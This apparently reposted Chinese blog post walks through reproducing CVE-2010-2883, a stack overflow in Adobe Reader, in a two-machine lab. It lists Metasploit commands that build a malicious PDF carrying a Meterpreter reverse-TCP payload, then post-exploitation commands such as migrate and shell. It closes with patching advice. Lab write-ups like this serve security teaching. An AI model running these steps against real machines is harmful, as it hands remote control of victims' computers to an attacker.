CVE-2010-2883漏洞復現

今天的漏洞復現,選了一個Adobe的一個有關打開pdf就會中招的漏洞。shell

1.原理

Adobe Reader在處理CoolType字體文件的sing表時,存在棧溢出漏洞,當打開特製的惡意PDF文件時,可容許任意代碼遠程執行。windows

2.影響版本

Adobe Reader 8.2.4 - 9.3.4微信

3.漏洞復現環境

Kali Linux + Windows 7 sp1 滲透機:Kali Linux (ip:192.168.95.140) 靶機:Windows 7 sp1 (ip:192.168.95.139) 軟件:Adobe Reader 9.0.exetcp

4.實操


因爲kali的metasploit集成了不少漏洞,所以咱們直接在metasploit上查找adobe_cooltype_sing漏洞進行復現1.搜索search adobe_cooltype_sing模塊2.調用滲透模塊3.查看模板詳情



調用meterpreter載荷,反向鏈接到滲透機 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 設置Kali Linux的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 192.168.95.140設置本地監聽端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888 設置帶有後門程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME test.pdf 執行滲透生成文件 msf exploit(adobe_cooltype_sing) > exploit


將含有木馬的pdf文件拷貝到桌面字體

Metasploit開啓shell監聽會話,等待肉雞上線ui

在windows7上安裝Adobe Reader9.0spa

將PDF木馬文件拷貝到Windows 7並打開.net

打開文件後,Metasploit獲取shell會話,並用Meterpreter控制肉雞3d


查看系統信息 meterpreter > sysinfo 查看當前用戶 meterpreter > getuid 截屏 meterpreter > screenshot



獲取進程 meterpreter > ps 切換進程meterpreter > migrate 1548



獲取Dos Shell meterpreter > shell C:\Windows\system32>ipconfig


5.實驗總結


能夠看到,一旦電腦打開特殊定製的pdf以後,在沒有攔截的狀況下,直接變成肉雞。真實環境下,不少黑客會利用此方法,結合社會工程學,例如經過郵件、QQ羣、微信羣等多渠道,誘導用戶下載並打開。所以用戶在打開以前必定要明確文件來源,或者用殺毒軟件先殺毒,再打開。另外,就是儘可能保證電腦的軟件處於最新版,這樣才能最大程度下降被攻擊的概率。


6.漏洞修復


下載Adobe Reader最新版本。安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級。



本文分享自微信公衆號 - 滲透吧(shentouba)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。code

相關文章
相關標籤/搜索